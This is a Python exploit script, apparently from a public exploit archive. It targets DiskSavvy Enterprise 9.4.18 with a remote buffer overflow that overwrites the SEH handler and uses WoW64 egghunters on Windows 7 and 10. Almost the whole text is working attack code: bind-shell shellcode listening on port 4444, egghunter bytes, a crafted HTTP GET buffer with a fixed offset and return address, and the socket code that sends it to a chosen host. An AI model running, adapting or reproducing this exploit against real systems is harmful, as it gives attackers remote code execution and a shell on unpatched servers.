# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters # Date: 2017-02-22 # Exploit Author: Peter Baris # Vendor Homepage: www.saptech-erp.com.au # Software Link: http://www.disksavvy.com/downloads.html # Version: 9.4.18 # Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64 # WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems # Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit # Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version # If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php import socket import sys try: host = sys.argv[1] os = sys.argv[2] port = 80 except IndexError: print "[+] Usage %s win7/win10" % sys.argv[0] print "[i] Example: dsavvy.py localhost win10" sys.exit() # 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20 shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76" "\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27" "\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5" "\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e" "\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03" "\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a" "\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54" "\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2" "\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54" "\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37" "\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17" "\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f" "\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73" "\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc" "\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a" "\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b" "\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e" "\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91" "\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd" "\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e" "\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec" "\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa" "\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4") crash = "\x41" * 2487 retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret filler = "\x44" * (2505-334-300-100) nseh = "\xeb\x08\x90\x90" stack_fill="\x41"*100 nops="\x90"*8 egg = "t00wt00w" if os == "win7": wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0" "\x33\xd2" "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd" "\x2e\x5a\x3c\x05\x74\xef\xb8" "\x74\x30\x30\x77" "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89" "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf") elif os == "win10": wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31" "\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8" "\x74\x30\x30\x77" "\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" "\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1") else: print "[!] This windows version is not supported yet" exit(0) exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler buffer = "GET /"+exploit+" HTTP/1.1\r\n" buffer+= "Host: "+host+"\r\n" buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n" buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer+="Accept-Language: en-US,en;q=0.5\r\n" buffer+="Accept-Encoding: gzip, deflate\r\n" buffer+="Referer: http://"+host+"/login\r\n" buffer+="Connection: keep-alive\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="Content-Length: 5900\r\n\r\n" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) s.send(buffer) s.close()